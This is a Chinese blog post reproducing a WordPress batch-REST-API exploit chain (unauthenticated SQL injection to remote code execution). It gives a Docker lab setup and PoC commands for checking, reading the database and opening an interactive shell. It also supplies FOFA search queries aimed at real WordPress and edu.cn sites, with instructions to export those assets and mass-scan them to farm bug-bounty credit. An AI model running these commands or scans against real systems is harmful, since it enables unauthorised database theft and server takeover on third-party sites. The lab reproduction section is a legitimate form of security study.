news 2026/8/1 2:15:28

复现-edu通杀刷分 CVE-2026-63030/60137-Wp2Shell命令执行+SQL注入-内容来自B站:想当文人的黑客

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
复现-edu通杀刷分 CVE-2026-63030/60137-Wp2Shell命令执行+SQL注入-内容来自B站:想当文人的黑客

WordPress 内置 REST API,允许开发者通过 HTTP 请求与站点进行数据交互,实现前后端分离、移动应用对接及第三方服务集成。其批量请求端点(/wp-json/batch/v1)自5.6版本起内置,用于将多个子请求打包为单次 HTTP 调用以提升性能。攻击者无需身份认证即可通过漏洞链触发数据库查询,实现管理员账户信息泄露。可实现未授权 SQL 注入获取管理员密码哈希,再通过破解管理员密码并利用插件安装功能可实现代码执行。

影响版本

  • WordPress 6.8.0-6.85

  • WordPress 6.9.0 – 6.9.4

  • WordPress 7.0.0 – 7.0.1

    利用条件:

  • 目标系统的REST API 接口处于开启状态【WordPress 默认开启】

  • FOFA语法:

    app="WordPress"

edu刷证书站也是OK的

app="WordPress" && host="edu.cn"

0x2 靶场环境搭建

靶场下载:

先下载官方 WordPress 6.9.4 源码:https://wordpress.org/wordpress-6.9.4.tar.gz

进入wordpress文件夹,在同目录新建docker-compose.yml,内容如下:

services:
web:
image: wordpress:6.9.4-apache
ports:
- "8090:80"
environment:
WORDPRESS_DB_HOST: db
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wpdb
volumes:
- ./:/var/www/html
depends_on:
- db
restart: unless-stopped

db:
image: mariadb:10.6
environment:
MYSQL_DATABASE: wpdb
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
MYSQL_ROOT_PASSWORD: rootpass
volumes:
- db_data:/var/lib/mysql
restart: unless-stopped

volumes:
db_data:

启动环境:

# 启动容器 docker-compose up -d # 给目录权限,避免安装报错 docker-compose exec web chown -R www-data:www-data /var/www/html

访问:http://localhost:8090/

0x3 漏洞利用

一、poc脚本

GitHub项目地址:

https://github.com/Icex0/wp2shell-poc

1、漏洞存活检测

python3 wp2shell.py check http://localhost:8090/

重点关注这一行,若存在,说明目标存在 Batch 路由混淆行为:

[+] VULNERABLE — batch route-confusion behavior detected.

2、SQL注入漏洞

python3 wp2shell.py read http://127.0.0.1:8090 --query "SELECT DATABASE()" python3 wp2shell.py read http://127.0.0.1:8090 --query "SELECT @@version"

3、命令执行RCE

python3 wp2shell.py shell http://localhost:8090/ -i

二、批量刷分

FOFA语法:

app="WordPress"

把相关资产导出,然后使用下面这个脚本批量测试,GitHub项目地址:

https://github.com/fullhunt/wp2shell-scan

安装依赖:

pip3 install -r requirements.txt

  • -u单个目标

  • -f批量目标文件(txt 一行一个 URL)

  • -o输出结果文件

  • --check-type检测模式

  • time-based时间盲注(推荐,无破坏、最稳定)

  • error-based报错盲注(速度快,部分站点会拦截报错)

  • --timeout请求超时时间

  • --delay盲注休眠时长(默认 3 秒)

批量检测命令(时间盲注,推荐)

python3 wp2shell-scan.py check -l targets.txt

存在漏洞即显示下面的:

三、Yakit插件漏洞扫

下载对应CVE漏洞的插件

批量导入

直接就可以看存在漏洞的资产了

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/1 2:15:25

GoldHEN Cheats Manager:终极PS4游戏修改增强工具完全指南

GoldHEN Cheats Manager:终极PS4游戏修改增强工具完全指南 【免费下载链接】GoldHEN_Cheat_Manager GoldHEN Cheats Manager 项目地址: https://gitcode.com/gh_mirrors/go/GoldHEN_Cheat_Manager GoldHEN Cheats Manager是一款专为PlayStation 4设计的开源游…

作者头像 李华
网站建设 2026/8/1 2:11:48

物联网开发入门:基于QuecPython的嵌入式Python环境搭建与实战

1. 从零开始:为什么是QuecPython?如果你正在物联网领域摸索,或者手头恰好有一块移远通信的模组,比如EC600S、EC200U这些,那你大概率听说过QuecPython。第一次接触这个名字,你可能会有点懵:这到底…

作者头像 李华
网站建设 2026/8/1 2:11:33

手动画图敲公式耗时耗力?实测 3 款 AI 论文工具,从效率到质量全面减负

对于理工科、经管类毕业生与科研人员而言,论文撰写最大的痛点从来不是正文文字构思,而是手动绘制实验图表、逐条敲击复杂数理公式、反复调整排版格式:用 Visio 画算法架构图耗费大半天、Word 公式编辑器排版错乱、Excel 图表导入论文后图例错…

作者头像 李华
网站建设 2026/8/1 2:06:44

使用Serva搭建PXE服务器实现Windows 10网络自动化安装

1. 项目概述:为什么我们需要PXE服务器?如果你管理过超过十台电脑,或者经常需要给不同型号的机器重装系统,那你一定对抱着U盘跑来跑去、反复插拔、确认启动项的日子深恶痛绝。更别提有时候U盘不识别、镜像损坏,或者需要…

作者头像 李华
网站建设 2026/8/1 2:05:48

解锁GPT潜能:三层配置法打造你的专属AI副脑

你是不是也有这种感觉:每天打开 ChatGPT,问的问题越来越复杂,但得到的回答却越来越“水”?要么是车轱辘话来回说,要么是避重就轻给个通用模板,甚至开始一本正经地胡说八道。你开始怀疑,是 GPT 变…

作者头像 李华